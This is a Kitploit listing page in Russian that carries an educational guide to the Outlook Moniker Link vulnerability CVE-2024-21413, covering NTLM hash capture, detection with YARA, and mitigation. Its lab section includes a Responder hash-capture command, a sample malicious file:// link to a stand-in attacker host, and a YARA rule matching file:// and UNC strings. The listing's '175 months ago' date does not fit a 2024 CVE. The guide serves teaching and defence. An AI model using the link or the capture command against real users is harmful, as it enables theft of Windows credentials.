Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Moniker-Link--CVE-2024-21413- — Образовательное руководство по CVE-2024-21413, уязвимости Outlook zero-click Moniker Link, охватывающее поток атаки, захват учетных данных NTLM, обнаружение с помощью YARA и стратегии смягчения. | Kitploit
Инструменты/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
Взлом паролейИнструменты фишингаАнализ уязвимостейЭксплуатацияОбход IDS/IPSЛатеральное перемещениеТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Безопасность Электронной Почты
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

Образовательное руководство по CVE-2024-21413, уязвимости Outlook zero-click Moniker Link, охватывающее поток атаки, захват учетных данных NTLM, обнаружение с помощью YARA и стратегии смягчения.

Репозиторий
175 месяцев назадЕщё не проверено

🔗 Moniker Link (CVE-2024-21413) — Практическое руководство по уязвимости Zero-Click в Outlook


📌 1. Введение

CVE-2024-21413, известная как уязвимость Moniker Link, представляет собой критическую уязвимость в Microsoft Outlook, позволяющую злоумышленникам раскрывать учетные данные пользователя без какого-либо взаимодействия.

В отличие от традиционных фишинговых атак, эту уязвимость можно активировать просто просмотром электронного письма, что делает её особенно опасной в корпоративных средах.

Проблема связана с тем, как Outlook обрабатывает moniker links, вызывая непреднамеренные попытки аутентификации на контролируемые злоумышленником системы.


🧠 2. Ключевые понятия

Понимание следующих понятий важно:

🔹 Moniker Link

Механизм, специфичный для Windows, который позволяет приложениям ссылаться на внешние ресурсы с использованием таких протоколов, как:

  • file://
  • unc://

🔹 NTLM-аутентификация

  • Устаревший протокол аутентификации Windows
  • Автоматически отправляет хэшированные учетные данные при доступе к удаленным ресурсам
  • Подвержен атакам перехвата и ретрансляции учетных данных

🔹 UNC-путь (Universal Naming Convention)

\\attacker-server\share

Используется для доступа к общим ресурсам по сети. В данной уязвимости он используется для принудительных запросов аутентификации.

🔹 Обход защищенного просмотра (Protected View)

Защищенный просмотр Outlook предназначен для изоляции потенциально опасного содержимого. Эта уязвимость обходит эту защиту, позволяя доступ к внешним ресурсам.


⚙️ 3. Как это работает

Порядок атаки (пошагово)

  1. Создание полезной нагрузки

    • Злоумышленник встраивает вредоносную moniker-ссылку (например, file://attacker-server/share) в электронное письмо.
  2. Доставка

    • Письмо отправляется жертве.
  3. Активация

    • Жертва просматривает или открывает письмо в Outlook.
  4. Автоматическая обработка

    • Outlook обрабатывает ссылку без взаимодействия с пользователем.
  5. Запрос аутентификации

    • Windows пытается выполнить NTLM-аутентификацию на сервере злоумышленника.
  6. Раскрытие учетных данных

    • Злоумышленник перехватывает NTLM-хэш.

Схема атаки

[Attacker]
    |
    | 1. Send crafted email
    v
[Victim Outlook]
    |
    | 2. Auto-process moniker link
    v
[Windows System]
    |
    | 3. NTLM authentication attempt
    v
[Attacker Server]
    |
    | 4. Capture NTLM hash
    v
[Credential Abuse / Lateral Movement]

🌍 4. Реальное влияние

Типичные сценарии атак

  • Целевые фишинговые кампании против организаций
  • Сбор учетных данных в корпоративных сетях
  • Первоначальный доступ для перемещения по сети (lateral movement)

Цели злоумышленника

  • Перехват NTLM-хэшей
  • Ретрансляция аутентификации на внутренние службы
  • Повышение привилегий в сети

🛠️ 5. Инструменты и технологии

Инструменты для атак / исследований

  • Responder — перехватывает NTLM-хэши аутентификации
  • Impacket — набор инструментов для эксплуатации сети
  • ntlmrelayx.py — выполняет атаки с ретрансляцией NTLM

Инструменты защиты

  • Microsoft Defender — обнаружение и реагирование на конечных точках
  • Wireshark — анализ сетевого трафика
  • Sysmon — расширенное журналирование системных событий

💻 6. Практический пример (только в лабораторной среде)

⚠️ Выполняйте только в контролируемых лабораторных средах

Запуск службы перехвата NTLM

sudo responder -I eth0

Пример вредоносной ссылки

<a href="file://attacker-ip/share">Open Document</a>

Ожидаемый результат

[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. Обнаружение (правило YARA)

Правило обнаружения было разработано Флорианом Ротом для выявления попыток эксплуатации с использованием moniker-ссылок.

Пример правила YARA

rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

Варианты использования обнаружения

  • Сканирование на почтовых шлюзах
  • Генерация оповещений в SIEM
  • Охота за угрозами для подозрительных ссылок

🛡️ 8. Смягчение и лучшие практики

Управление обновлениями

  • Немедленно установите обновления безопасности от Microsoft

Усиление аутентификации

  • Отключите NTLM, где это возможно
  • Используйте аутентификацию Kerberos

Сетевые средства контроля

  • Блокируйте исходящий SMB (TCP 445) во внешние сети
  • Ограничьте ненужные исходящие соединения

Безопасность электронной почты

  • Фильтруйте или очищайте ссылки типа file:// и UNC
  • Используйте передовые решения для защиты от угроз электронной почты

Мониторинг и обнаружение

  • Отслеживайте исходящие попытки аутентификации
  • Регистрируйте и оповещайте о необычном SMB-трафике

⚠️ 9. Распространенные ошибки

  • Предположение, что требуется взаимодействие пользователя
  • Игнорирование рисков, связанных с NTLM, в современных средах
  • Полагаться только на антивирус без сетевых средств контроля
  • Откладывание развертывания обновлений

🧾 10. Заключение

CVE-2024-21413 демонстрирует, как глубоко интегрированные системные поведения (например, автоматическая аутентификация) могут быть использованы через, казалось бы, безвредные входные данные, такие как ссылки в письмах.

Ключевые выводы

  • Уязвимость нулевого клика (Zero-Click) — не требует взаимодействия с пользователем
  • Эксплуатирует обработку Outlook moniker-ссылок
  • Приводит к утечке NTLM-учетных данных
  • Обнаруживается с помощью YARA и мониторинга сети
  • Предотвращается с помощью обновлений и правильной конфигурации

📚 11. Дополнительное чтение

  • Рекомендации Microsoft по безопасности — CVE-2024-21413
  • Документация Impacket (атаки с ретрансляцией NTLM)
  • Документация YARA
  • Памятка по аутентификации OWASP

💡 Рекомендация: Воспроизведите эту уязвимость в виртуальной лабораторной среде (например, Windows VM + атакующая ВМ), чтобы полностью понять цепочку атак и стратегии защиты.

Скачать инструмент